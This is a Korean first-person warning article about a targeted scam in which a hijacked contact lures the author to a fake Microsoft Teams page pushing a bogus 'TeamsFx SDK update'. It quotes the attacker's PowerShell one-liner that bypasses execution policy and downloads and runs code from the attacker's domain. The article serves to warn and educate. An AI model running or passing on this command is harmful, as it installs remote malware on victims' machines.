마이크로소프트 팀즈 통화 중에 해킹당할 뻔했어요 — 사기 수법은 다음과 같습니다

오늘 마이크로소프트 팀즈 통화처럼 일상적이고 겉보기에는 무해해 보이는 상황을 악용하려는 정교한 사회공학적 수법에 제가 어떻게 희생양이 될 뻔했는지 이야기해 드리겠습니다. 

대부분의 상호작용에서 특별히 이상한 점은 발견되지 않았습니다. 

업계 관계자라고 생각했던 사람이 마이크로소프트 팀즈로 회의를 하자고 연락을 해왔고, 협업을 좋아하는 저는 기꺼이 그 통화에 참여했습니다. 

스포일러 주의: 전화 저편의 사람은 사기꾼이었고, 제 컴퓨터에 악성 코드를 실행하도록 유도했습니다. 

암호화폐 및 웹3 커뮤니티에 속한 친구, 지인, 동료들에게 경고의 의미로 제가 겪은 모든 경험을 여기에 기록합니다. 

오늘은 거의 내 차례였지만, 내일은 다른 누군가가 될 수도 있죠. 

1단계: 설정 — “오랜 친구야, 오랜만에 전화해서 이야기 좀 나눠보자” 

잘 알려진 암호화폐 홍보 회사의 고위 직원으로 알려진 지인의 텔레그램 계정에서 문자 메시지를 받았을 때, 피싱 사기에 휘말릴 거라고는 상상도 못 할 겁니다. 

전형적인 위험 신호는 당장 눈에 띄지 않았다. 

이건 그냥 무작위 DM이 아니었어요. 

저는 'i'를 'l'로 미묘하게 바꾼 사칭 계정과 대화하고 있던 게 아니었어요 

저도 그 계정과 채팅 기록이 있어서 상대방이 진짜 사람인 줄 알았어요. 

처음 만났을 때는 모든 게 자연스러웠고, 서로 친근하게 대화를 나누며 다시 친분을 쌓아가는 모습이었다. 얼마 지나지 않아 30분 미팅 예약을 위한 캘린들 링크와 마이크로소프트 팀즈 통화 초대가 왔다.

앞서 말씀드렸듯이, 저는 그 과정 내내 단 한 번도 의심스러운 점을 발견하지 못했습니다. 최고 PR 회사의 고위 직원에게 기대할 수 있는 수준의 전문성과 인내심을 느낄 수 있었습니다. 

내가 알고 있던 건 업계 관계자의 캘린들리 페이지에서 팀즈 회의 일정을 잡았다는 것뿐이었다.

사기꾼은 해킹한 계정을 사용하여 팀즈 회의 링크를 보내며 연락을 시작합니다.

2단계: "데스크톱에서만 가입" 함정 

회의 당일이 되었고, 저는 예전처럼 휴대폰으로 팀즈 회의 링크를 클릭했습니다. 하지만 평소처럼 바로 회의에 접속되지 않았습니다. 회의 통화로 연결되는 대신, "주최자 설정으로 인해 모바일 기기를 통한 회의 접속이 허용되지 않습니다."라는 화면이 나타났습니다 

"어머나! 이런 일은 처음 겪어보네." 

음, 그것도 우연dent 아니었죠. 

돌이켜보면, 그게 아마 첫 번째 진짜 위험 신호였을 겁니다. 

오류 화면은 사기 수법의 일부입니다. 사기꾼들은 악성 페이로드가 PC에서만 실행되는 명령줄 스크립트이기 때문에 사용자가 데스크톱이나 노트북을 사용해야 합니다.

브라우저에 표시되는 URL " teams.livescalls.com" 은 실제 마이크로소프트 도메인이 아닙니다.

정식 Teams 회의에는 teams.microsoft.com 또는 teams.live.com을 사용하세요. 

"livescalls.com" 도메인은 멀리서 보면 진짜와 매우 비슷해 보이지만, 자세히 살펴보면 진짜와는 완전히 다릅니다. 

하나는 마이크로소프트가 관리하는 사이트로, 일일 활성 사용자 수가 3억 2천만 명이 넘는다고 주장합니다. 다른 하나는 공격자들이 운영하는 완전히 가짜 사이트입니다. 

물론 일부 조직에서는 팀 회의를 위해 맞춤 도메인을 사용할 수도 있습니다. 하지만 세계경제포럼에 따르면 2025년까지 사기꾼들에게 유출된 자금이 1조 달러를 넘어설 것으로 예상되는데, 이 정도면 제 직감을 무시할 이유가 충분했습니다. 

가짜 "팀 액세스 알림" 페이지는 모바일 액세스를 차단하여 피해자가 악성 스크립트가 실행될 수 있는 데스크톱을 사용하도록 강요합니다. URL에 유의하세요. teams.livescalls.com은 Microsoft 도메인이 아닙니다.

사기꾼은 모바일 접속이 차단된 후 피해자에게 "파트너들이 기다리고 있다"며 데스크톱 접속을 강요합니다

3단계: 페이로드 — “TeamsFx SDK 업데이트”

데스크톱에서 실행된 가짜 팀즈 회의는 마치 마이크로소프트 공식 문서에서 볼 수 있는 것처럼 전문적으로 디자인된 페이지를 보여주었습니다. 심지어 TeamsFx SDK가 2025년 9월까지 지원이 중단될 것이라는 마이크로소프트의 공식 문구까지 포함되어 있었습니다. 

해결 방법은 간단합니다. 코드 블록을 복사하여 터미널이나 명령 프롬프트에서 실행하세요.

구글 검색을 조금만 더 해보면 비슷한 SDK가 있다는 것을 알 수 있을 겁니다. 다만 이번 팀 회의에는 필요하지 않습니다. 

이 코드는 처음에는 무해해 보입니다. TeamsFx_API_KEY 및 MS_Teams_API_SECRET과 같이 공식적인 이름처럼 들리는 환경 변수를 설정하기 때문입니다. 하지만 실제 공격 경로는 코드 중간 어딘가에 숨겨져 있으며, 공격자들은 여러분이 이 문제를 발견할 거라고는 예상하지 못합니다

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

이 한 줄짜리 명령은 PowerShell 보안 정책(-ep bypass)을 우회하고 공격자의 서버에서 코드를 다운로드한 후 즉시 실행합니다(iex = Invoke-Expression). 

그렇게 순식간에 공격자들이 호스팅한 악성코드, 키로거 또는 원격 접속 도구가 사용자의 기기에 조용히 설치됩니다.

악성 "TeamsFx SDK 업데이트" 페이지가 참가자들에게 표시되는 것처럼 보이는 가짜 Teams 회의 인터페이스입니다. 통화 참가자는 AI가 생성한 영상입니다.

4단계: "걱정하지 마세요, 안전해요"라는 압박 단계

내가 스크립트 실행에 대해 주저하는 모습을 보이자, 사기꾼은 즉시 안심시키려는 듯한 말과 압박감을 동시에 드러냈다. 

"걱정하지 마세요, 아주 간단하고 안전합니다."라는 문구는 제가 PC에서 명령 프롬프트를 여는 방법을 보여주는 스크린샷의 지침을 따르도록 안심시켜 주기 위한 것이었습니다. 

"파트너들이 이미 Zoom에 참여했어요"라는 말은, 내가 간단한 명령 프롬프트 실행 방법조차 몰라서 모든 사람을 플랫폼으로 바꿔야 하는 상황을 만들지 않아도 된다는 압박감을 느끼게 하려는 의도였다.

안심이 되지도 않았고, 압박감을 느끼지도 않았습니다.

제가 구글 미트로 통화 장소를 옮기자고 제안했을 때, 그들은 거절했습니다. 알고 보니 그들의 사기는 가짜 팀즈 계정을 통해서만 통하는 것 같았습니다.

사기범은 악성 코드를 실행하는 방법에 대한 단계별 지침을 보내면서 피해자를 안심시키며 "걱정하지 마세요. 아주 간단하고 안전합니다."라고 말합니다

5단계: 허풍이 들통났음 — 차단 및 삭제됨

스크립트와 도메인을 확인해 보니 제 의심이 맞았습니다. 저는 사회공학적 공격에 당하고 있었고, 세계경제포럼의 2026년 통계에 포함될 뻔했습니다. 

사기꾼에게 직접적으로 "방금 확인해 봤는데, 이 명령어와 웹사이트는 합법적이지 않아요. 죄송하지만 해드릴 수 없을 것 같습니다."라고 말했습니다. 그리고 계속 대화를 원하시면 구글 미트에서 이야기하자고 제안했습니다.

"하지만 지금 회의 중입니다."라는 메시지가 상대방으로부터 왔다. 

예상했던 대로, 그들의 답변은 내가 통화에 참여하는 것이 얼마나 시급한지 깨닫게 하려는 의도였다. 어쨌든, 나는 모든 파트너들을 너무 오래 기다리게 하고 싶지 않았으니까.

잠시 후, 그들은 우리 사이의 모든 메시지를 삭제하고 저를 차단했습니다. 

아… 이건 단순한 위험 신호가 아니네요. 그야말로 진홍색이에요. 

비즈니스 파트너는 소프트웨어 업데이트에 대해 질문하는 순간 대화 기록 전체를 삭제하고 당신을 차단하지는 않습니다.

사기 행각이 발각된 후, 공격자는 회의가 "지금 진행 중"이라고 주장한 뒤 모든 메시지를 삭제하고 피해자를 차단합니다.

자신을 보호하는 방법

이러한 유형의 공격이 암호화폐, 웹3, 기술 산업 전반에 걸쳐 급증하고 있습니다. 사기꾼들은 홍보 전문가, 투자자, 프로젝트 책임자 등의 실제 계정을 해킹하거나 사칭하여 고가치 개인을 표적으로 삼고 있습니다. 안전을 확보하는 방법은 다음과 같습니다

• 회의 페이지에서 명령어를 절대 실행하지 마세요. 정식 화상 통화 플랫폼은 터미널이나 명령 프롬프트에 코드를 붙여넣으라고 요구하지 않습니다.
• URL을 확인하세요. 실제 Microsoft Teams 회의는 teams.microsoft.com 또는 teams.live.com에서 진행되며, “teams.livescalls.com”이나 이와 유사한 도메인에서는 진행되지 않습니다.
• "데스크톱 전용"이라는 요구 사항에 주의하세요. 회의에서 모바일 접속을 차단한다면, 이는 스크립트를 실행할 수 있는 컴퓨터에 접속하도록 유도하기 위한 의도적인 전략일 수 있습니다.
• 다른 채널을 통해 상대방을 확인하세요. 아는 사람이 평소와 다른 회의 링크를 보내왔다면, 직접 전화하거나 다른 플랫폼을 통해 메시지를 보내 확인하세요.
• "powershell -ep bypass"와 "iex" 명령어를 주의 깊게 살펴보세요. 이 두 가지는 스크립트에서 가장 위험한 신호입니다. 첫 번째는 보안을 비활성화하고, 두 번째는 다운로드한 코드를 묻지도 따지지도 않고 실행합니다.
• 이미 스크립트를 실행했다면: 즉시 인터넷 연결을 끊으세요. 전체 악성코드 검사를 실행하세요(Malwarebytes, Windows Defender Offline). 다른 안전한 기기에서 모든 암호를 변경하세요. 암호화폐 지갑과 은행 계좌에서 승인되지 않은 거래가 있는지 모니터링하세요.

이것이 암호화폐와 웹3에 중요한 이유는 무엇일까요?

저는 이것을 공격자들이 광범위하게 접근하여 어떤 대상이 공격에 응하는지 살펴보는 전형적인 피싱 공격이라고 부르지는 않겠습니다. 

아니요, 이는 여러 날에 걸쳐 진행된 표적형 사회공학적 공격이었습니다. 공격자들은 며칠 동안 업계 동료로 가장하여 친밀감을 형성하고, 그럴듯하게 꾸며진 가짜 마이크로소프트 페이지를 통해 팀즈 통화에서 기술적인 문제를 해결하도록 유도했습니다. 

공격자들은 당신의 신원dent를 훔치거나, 암호화폐 지갑을 털거나, 지속적인 원격 접속 악성 소프트웨어를 설치하는 등, 얻을 것은 많고 잃을 것은 아무것도 없습니다. 

창업자, 투자자 또는 암호화폐 및 기술 분야에서 회의에 참석하는 모든 분들은 이 글을 팀원들과 공유해 주세요. 이러한 사기 행각을 벌이는 사람들은 점점 더 교묘해지고 있으며, 유일한 방어책은 경각심을 갖는 것입니다.